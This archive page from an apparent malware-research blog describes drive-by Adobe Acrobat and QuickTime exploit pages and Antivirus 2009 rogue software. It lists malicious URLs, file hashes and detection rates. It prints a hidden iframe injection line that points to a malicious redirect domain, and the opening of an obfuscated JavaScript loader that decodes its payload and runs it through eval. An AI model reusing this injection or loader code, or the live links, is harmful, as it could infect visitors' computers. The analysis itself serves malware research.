Archive for the 'Video' Category

04
Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

By djpnuemo Comments
Categories: Database Update, IFRAME, Malicious Links, Malware, Video and Vulnerabilities

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different than the one posted earlier and this one redirects through multiple pages logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the binary installed is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and information about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites my be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This pages contains a simple hidden iframe that will load multiple pages logging each visitor how visits.

<iframe src=”http://megsrdomain.cn/tor/count.php?o=5″ width=1 height=1 style=”visibility: hidden”></iframe>

In the iframe we are redirected two times until we reach the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code and there is too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

06
Sep

Quicktime exploit page installs msupd_0809_upd070148.exe (VIDEO)

By djpnuemo Comments
Categories: Database Update, Investigated, Malicious Domains, Malicious Links, Malware, Malware Distribution and Video


Here is an example of an exploit page. This will check the computer for certain vulnerable Quicktime browser objects. If one is discovered, it will exploit the object and inject the malware to the computer and execute it. We recorded a video of the website exploiting Quicktime and installing the malware on the system (at the bottom of the post). This binary is available in /pnuemo-malware/ in our repository. See the FAQ for access. As usual, proceed at your own risk because links are still live as of this post date. One thing I will mention, when you visit the site, it logs your IP address so on subsequent visits, you’ll get a 404.

This post is very long because of the code within the page, so to read everything, make sure to read more.

hxxp://inetppui.com/html/2440/f8ae8aedaf494548b681dedb37dd3d5f/

<script language=JavaScript>function f1(z0){var i,j,ff=0xff,z9=0xc,b=0×400,
r,z7=3,s=0,z8=”ss”,w=0,p=0,t=Array(63,62,58,34,3,30,47,43,40,6,0,0,0,0,0,
0,21,24,39,60,22,29,25,15,17,26,33,46,4,11,7,54,10,53,1,2,36,14,18,55,51,5,
16,0,0,0,0,27,0,61,59,8,48,37,9,0,19,13,41,31,23,20,57,44,52,28,38,42,32,50,
45,12,56,49,35);z2=z0;l=z2.length;for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=
Math.min(l,b);i>0;l–,i–){z1=t[z2.charCodeAt(p++)-48];z3=z1<<s;w|=z3;
if(s){z4=0xe7^w;z5=z4&ff;z6=z5;w=w>>8;s-=2;r=r+String.fromCharCode(z6)}
else{z7=8;s=6;z8=”7″;z9=w}}y1=”document”;y2=”write”;eval(y1+”.”+y2+”(r)”)}}
y5=”f2″;y4=”f1″;y3=y4+’(”_0xTPKAO_08t9UAO_GjzhK8tFGaQhkqscUnyJ38TfUx
OcGjzhK8tF6vs3U7jN02oX57u3I7oK97OYhP3fUjtfUjuX2neSDCyT3IsXPIsXsEyhPx
Bh3Czhsx3YBaOsP2or5C7XUbvPMsvu2IoIlCvQIP8sIIyNhPsjU78jU7OYBPsPhsjT1s
8YBaOc08t9UAO_lc342FOvW1O42ATNbxtIG8tP3c3YOAO_zCtU9FOvW1OpVIvK5
boN6sJfS8T9S8tIlqz99jJmVAeU5nTYBEbvNjJ@5welIcJSsEyYXEbHIAeN_8TSsidSMj
tgXEbHIAeNhnzmD8OYMoT5kvWlMoT5kvWlMoTlN8tYPoTmhvpYPoTHNiJ5MoTk
kEJ5MoTkkaQDlwX9PjtwlqtmhEyw_8TSuqy@GiQYXoJVPcXYlAt9DwX9PjtwlCWlMv
dV9AtSV8dV9AtR98dV1EJZN8dVUAthMAyw_8TSuqyRPAtSMFphMAtYXoJVPcXYhv
JRPoT5NAphMoThlEtmMoT5NAphMoTHM8tZlwX9PjtwlqtlhEyw_8TSuqyRPAJSMFph
MAtSMFJ5kiQSMFpD0ipYXoJVPcXY_vJDMoTl4aQmlwX9PjtwlqtD_Eyw_8TSuqyRPAt
SMjJ99EpSMFJ5MAJSMfpZ0ipSMFpV_vQSMnQZM8QYXoJVPcXYN8QRDwX9PjtwlqtS
98dVI8JHNvdVD8WSSvdVV8Jk4vdVIaQVN8dV5ip@GAyw_8TSuqyR5atYXoJVPcXYN
Continue reading ‘Quicktime exploit page installs msupd_0809_upd070148.exe (VIDEO)’

03
Sep

Antivirus 2009 (video)

By lithium Comment
Categories: Antivirus 2009, Database Update, Rogue Security Software and Video

Sites: hxxp://antivirusworld9.com -> hxxp://scanthnet.com -> hxxp://innovagest2000sl.com
Files: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
VirusTotal Result: 4/36 (11.11%)
MDB: /lithium-malware/AV2009Install.zip

The Camtasia Studio video content presented here requires JavaScript to be enabled and the latest version of the Macromedia Flash Player. If you are you using a browser with JavaScript disabled please enable it now. Otherwise, please update your version of the free Flash Player by downloading here.

Removal:

Remove this threat with MalwareBytes!

Malware Database Forum



Click for

Malware Removal Information



Special Deals


$20 Off Panda Internet Security 2009

 

December 2008
M T W T F S S
« Nov    
1234567
891011121314
15161718192021
22232425262728
293031  

Support Malware Database!


Security Engineering: A Guide to Building Dependable Distributed Systems

Reversing: Secrets of Reverse Engineering

Crimeware: Understanding New Attacks and Defenses (Symantec Press)

Security Power Tools

IT Security Interviews Exposed: Secrets to Landing Your Next Information Security Job

Windows Command-Line Administrator's Pocket Consultant, 2nd Edition

CompTIA Security+ Certification Kit